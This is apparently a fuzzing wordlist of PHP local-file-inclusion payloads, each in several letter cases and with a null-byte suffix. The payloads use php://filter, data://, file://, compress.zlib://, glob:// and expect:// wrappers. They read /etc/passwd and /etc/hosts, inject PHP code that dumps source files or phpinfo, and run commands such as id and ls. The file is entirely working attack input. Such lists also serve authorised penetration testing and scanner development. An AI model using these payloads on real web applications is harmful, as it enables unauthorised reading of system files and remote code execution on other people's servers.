compress.zlib:///etc/hosts
Compress.Zlib:///Etc/Hosts
COMPRESS.ZLIB:///ETC/HOSTS
compress.zlib:///etc/hosts%00
Compress.Zlib:///Etc/Hosts%00
COMPRESS.ZLIB:///ETC/HOSTS%00
compress.zlib:///etc/passwd
Compress.Zlib:///Etc/Passwd
COMPRESS.ZLIB:///ETC/PASSWD
compress.zlib:///etc/passwd%00
Compress.Zlib:///Etc/Passwd%00
COMPRESS.ZLIB:///ETC/PASSWD%00
data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
Data://Text/Plain,<?Php Echo Base64_Encode(File_Get_Contents("Index.Php")); ?>
DATA://TEXT/PLAIN,<?PHP ECHO BASE64_ENCODE(FILE_GET_CONTENTS("INDEX.PHP")); ?>
data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>%00
Data://Text/Plain,<?Php Echo Base64_Encode(File_Get_Contents("Index.Php")); ?>%00
DATA://TEXT/PLAIN,<?PHP ECHO BASE64_ENCODE(FILE_GET_CONTENTS("INDEX.PHP")); ?>%00
data://text/plain,<?php echo base64_encode(phpinfo()); ?>
Data://Text/Plain,<?Php Echo Base64_Encode(Phpinfo()); ?>
DATA://TEXT/PLAIN,<?PHP ECHO BASE64_ENCODE(PHPINFO()); ?>
data://text/plain,<?php echo base64_encode(phpinfo()); ?>%00
DATA://TEXT/PLAIN,<?PHP ECHO BASE64_ENCODE(PHPINFO()); ?>%00
Data://Text/Plain,<?Php Echo Base64_Encode(Phpinfo()); ?>%00
Data://Text/Plain,<?Php Phpinfo(); ?>
data://text/plain,<?php phpinfo(); ?>
DATA://TEXT/PLAIN,<?PHP PHPINFO(); ?>
data://text/plain,<?php phpinfo(); ?>%00
DATA://TEXT/PLAIN,<?PHP PHPINFO(); ?>%00
Data://Text/Plain,<?Php Phpinfo(); ?>%00
DATA://TEXT/PLAIN;BASE64,PD9WAHAGZWNOBYBIYXNLNJRFZW5JB2RLKGZPBGVFZ2V0X2NVBNRLBNRZKCIVZXRJL3BHC3N3ZCIPKTSGPZ4=
data://text/plain;base64,pd9wahagzwnobybiyxnlnjrfzw5jb2rlkgzpbgvfz2v0x2nvbnrlbnrzkcivzxrjl3bhc3n3zcipktsgpz4=
Data://Text/Plain;Base64,Pd9wahagzwnobybiyxnlnjrfzw5jb2rlkgzpbgvfz2v0x2nvbnrlbnrzkcivzxrjl3bhc3n3zcipktsgpz4=
data://text/plain;base64,PD9waHAgZWNobyBiYXNlNjRfZW5jb2RlKGZpbGVfZ2V0X2NvbnRlbnRzKCIvZXRjL3Bhc3N3ZCIpKTsgPz4=
DATA://TEXT/PLAIN;BASE64,PD9WAHAGZWNOBYBIYXNLNJRFZW5JB2RLKGZPBGVFZ2V0X2NVBNRLBNRZKCIVZXRJL3BHC3N3ZCIPKTSGPZ4=%00
data://text/plain;base64,pd9wahagzwnobybiyxnlnjrfzw5jb2rlkgzpbgvfz2v0x2nvbnrlbnrzkcivzxrjl3bhc3n3zcipktsgpz4=%00
Data://Text/Plain;Base64,Pd9wahagzwnobybiyxnlnjrfzw5jb2rlkgzpbgvfz2v0x2nvbnrlbnrzkcivzxrjl3bhc3n3zcipktsgpz4=%00
data://text/plain;base64,PD9waHAgZWNobyBiYXNlNjRfZW5jb2RlKGZpbGVfZ2V0X2NvbnRlbnRzKCIvZXRjL3Bhc3N3ZCIpKTsgPz4=%00
EXPECT://ID
expect://id
Expect://Id
EXPECT://ID%00
expect://id%00
Expect://Id%00
EXPECT://LS
expect://ls
Expect://Ls
EXPECT://LS%00
expect://ls%00
Expect://Ls%00
file:///etc/passwd
File:///Etc/Passwd
FILE:///ETC/PASSWD
file:///etc/passwd%00
File:///Etc/Passwd%00
FILE:///ETC/PASSWD%00
glob:///etc/*
GLOB:///ETC/*
Glob:///Etc/*
Glob:///Etc/*%00
GLOB:///ETC/*%00
glob:///etc/*%00
Glob:///Etc/*.*
glob:///etc/*.*
GLOB:///ETC/*.*
Glob:///Etc/*.*%00
glob:///etc/*.*%00
GLOB:///ETC/*.*%00
Glob:///Var/Www/Html/*.Php
glob:///var/www/html/*.php
GLOB:///VAR/WWW/HTML/*.PHP
Glob:///Var/Www/Html/*.Php%00
glob:///var/www/html/*.php%00
GLOB:///VAR/WWW/HTML/*.PHP%00
Php://Fd/0
php://fd/0
PHP://FD/0
Php://Fd/0%00
php://fd/0%00
PHP://FD/0%00
PHP://FD/1
php://fd/1
Php://Fd/1
php://fd/1%00
PHP://FD/1%00
Php://Fd/1%00
php://fd/10
PHP://FD/10
Php://Fd/10
php://fd/10%00
PHP://FD/10%00
Php://Fd/10%00
php://fd/2
PHP://FD/2
Php://Fd/2
php://fd/2%00
PHP://FD/2%00
Php://Fd/2%00
php://fd/3
PHP://FD/3
Php://Fd/3
PHP://FD/3%00
php://fd/3%00
Php://Fd/3%00
php://fd/4
PHP://FD/4
Php://Fd/4
PHP://FD/4%00
php://fd/4%00
Php://Fd/4%00
Php://Fd/5
PHP://FD/5
php://fd/5
Php://Fd/5%00
PHP://FD/5%00
php://fd/5%00
Php://Fd/6
php://fd/6
PHP://FD/6
Php://Fd/6%00
PHP://FD/6%00
php://fd/6%00
PHP://FD/7
Php://Fd/7
php://fd/7
php://fd/7%00
PHP://FD/7%00
Php://Fd/7%00
PHP://FD/8
php://fd/8
Php://Fd/8
php://fd/8%00
Php://Fd/8%00
PHP://FD/8%00
Php://Fd/9
PHP://FD/9
php://fd/9
php://fd/9%00
PHP://FD/9%00
Php://Fd/9%00
php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg==
php://filter/convert.base64-decode/resource=data://plain/text,pd9wahagcghwaw5mbygpoya/pg==
PHP://FILTER/CONVERT.BASE64-DECODE/RESOURCE=DATA://PLAIN/TEXT,PD9WAHAGCGHWAW5MBYGPOYA/PG==
Php://Filter/Convert.Base64-Decode/Resource=Data://Plain/Text,Pd9wahagcghwaw5mbygpoya/Pg==
php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgcGhwaW5mbygpOyA/Pg==%00
PHP://FILTER/CONVERT.BASE64-DECODE/RESOURCE=DATA://PLAIN/TEXT,PD9WAHAGCGHWAW5MBYGPOYA/PG==%00
php://filter/convert.base64-decode/resource=data://plain/text,pd9wahagcghwaw5mbygpoya/pg==%00
Php://Filter/Convert.Base64-Decode/Resource=Data://Plain/Text,Pd9wahagcghwaw5mbygpoya/Pg==%00
PHP://FILTER/CONVERT.BASE64-DECODE/RESOURCE=DATA://PLAIN/TEXT,SEFDS0VSIEHBQ0TFUG==
php://filter/convert.base64-decode/resource=data://plain/text,sefds0vsiehbq0tfug==
php://filter/convert.base64-decode/resource=data://plain/text,SEFDS0VSIEhBQ0tFUg==
Php://Filter/Convert.Base64-Decode/Resource=Data://Plain/Text,Sefds0vsiehbq0tfug==
php://filter/convert.base64-decode/resource=data://plain/text,SEFDS0VSIEhBQ0tFUg==%00
PHP://FILTER/CONVERT.BASE64-DECODE/RESOURCE=DATA://PLAIN/TEXT,SEFDS0VSIEHBQ0TFUG==%00
php://filter/convert.base64-decode/resource=data://plain/text,sefds0vsiehbq0tfug==%00
Php://Filter/Convert.Base64-Decode/Resource=Data://Plain/Text,Sefds0vsiehbq0tfug==%00
PHP://FILTER/CONVERT.BASE64-ENCODE/RESOURCE=/ETC/PASSWD
php://filter/convert.base64-encode/resource=/etc/passwd
Php://Filter/Convert.Base64-Encode/Resource=/Etc/Passwd
PHP://FILTER/CONVERT.BASE64-ENCODE/RESOURCE=/ETC/PASSWD%00
php://filter/convert.base64-encode/resource=/etc/passwd%00
Php://Filter/Convert.Base64-Encode/Resource=/Etc/Passwd%00
php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd
PHP://FILTER/CONVERT.BASE64-ENCODE|CONVERT.BASE64-DECODE/RESOURCE=FILE:///ETC/PASSWD
Php://Filter/Convert.Base64-Encode|Convert.Base64-Decode/Resource=File:///Etc/Passwd
php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd%00
PHP://FILTER/CONVERT.BASE64-ENCODE|CONVERT.BASE64-DECODE/RESOURCE=FILE:///ETC/PASSWD%00
Php://Filter/Convert.Base64-Encode|Convert.Base64-Decode/Resource=File:///Etc/Passwd%00
php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=
PHP://FILTER/CONVERT.ICONV.UTF-8.UTF-16LE/RESOURCE=DATA://PLAIN/TEXT,TROLOLOHELLOOO=
Php://Filter/Convert.Iconv.Utf-8.Utf-16le/Resource=Data://Plain/Text,Trololohellooo=
PHP://FILTER/CONVERT.ICONV.UTF-8.UTF-16LE/RESOURCE=DATA://PLAIN/TEXT,TROLOLOHELLOOO=%00
php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=%00
Php://Filter/Convert.Iconv.Utf-8.Utf-16le/Resource=Data://Plain/Text,Trololohellooo=%00
Php://Filter/Convert.Quoted-Printable-Encode/Resource=Data://Plain/Text,£Hellooo=
php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=
PHP://FILTER/CONVERT.QUOTED-PRINTABLE-ENCODE/RESOURCE=DATA://PLAIN/TEXT,£HELLOOO=
Php://Filter/Convert.Quoted-Printable-Encode/Resource=Data://Plain/Text,£Hellooo=%00
php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=%00
PHP://FILTER/CONVERT.QUOTED-PRINTABLE-ENCODE/RESOURCE=DATA://PLAIN/TEXT,£HELLOOO=%00
php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd
PHP://FILTER/READ=STRING.TOUPPER|STRING.ROT13|STRING.TOLOWER/RESOURCE=FILE:///ETC/PASSWD
Php://Filter/Read=String.Toupper|String.Rot13|String.Tolower/Resource=File:///Etc/Passwd
php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd%00
PHP://FILTER/READ=STRING.TOUPPER|STRING.ROT13|STRING.TOLOWER/RESOURCE=FILE:///ETC/PASSWD%00
Php://Filter/Read=String.Toupper|String.Rot13|String.Tolower/Resource=File:///Etc/Passwd%00
php://filter/string.strip_tags/resource=data://text/plain,<h1>HACKER</h1>
php://filter/string.strip_tags/resource=data://text/plain,<h1>hacker</h1>
PHP://FILTER/STRING.STRIP_TAGS/RESOURCE=DATA://TEXT/PLAIN,<H1>HACKER</H1>
Php://Filter/String.Strip_Tags/Resource=Data://Text/Plain,<H1>Hacker</H1>
php://filter/string.strip_tags/resource=data://text/plain,<h1>hacker</h1>%00
php://filter/string.strip_tags/resource=data://text/plain,<h1>HACKER</h1>%00
PHP://FILTER/STRING.STRIP_TAGS/RESOURCE=DATA://TEXT/PLAIN,<H1>HACKER</H1>%00
Php://Filter/String.Strip_Tags/Resource=Data://Text/Plain,<H1>Hacker</H1>%00
Php://Filter/String.Toupper/String.Rot13/String.Tolower/Resource=File:///Etc/Passwd
PHP://FILTER/STRING.TOUPPER/STRING.ROT13/STRING.TOLOWER/RESOURCE=FILE:///ETC/PASSWD
php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd
php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd%00
PHP://FILTER/STRING.TOUPPER/STRING.ROT13/STRING.TOLOWER/RESOURCE=FILE:///ETC/PASSWD%00
Php://Filter/String.Toupper/String.Rot13/String.Tolower/Resource=File:///Etc/Passwd%00
php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd
PHP://FILTER/ZLIB.DEFLATE/CONVERT.BASE64-ENCODE/RESOURCE=FILE:///ETC/PASSWD
Php://Filter/Zlib.Deflate/Convert.Base64-Encode/Resource=File:///Etc/Passwd
php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd%00
PHP://FILTER/ZLIB.DEFLATE/CONVERT.BASE64-ENCODE/RESOURCE=FILE:///ETC/PASSWD%00
Php://Filter/Zlib.Deflate/Convert.Base64-Encode/Resource=File:///Etc/Passwd%00
php://filter/zlib.inflate/resource=/etc/passwd
PHP://FILTER/ZLIB.INFLATE/RESOURCE=/ETC/PASSWD
Php://Filter/Zlib.Inflate/Resource=/Etc/Passwd
php://filter/zlib.inflate/resource=/etc/passwd%00
PHP://FILTER/ZLIB.INFLATE/RESOURCE=/ETC/PASSWD%00
Php://Filter/Zlib.Inflate/Resource=/Etc/Passwd%00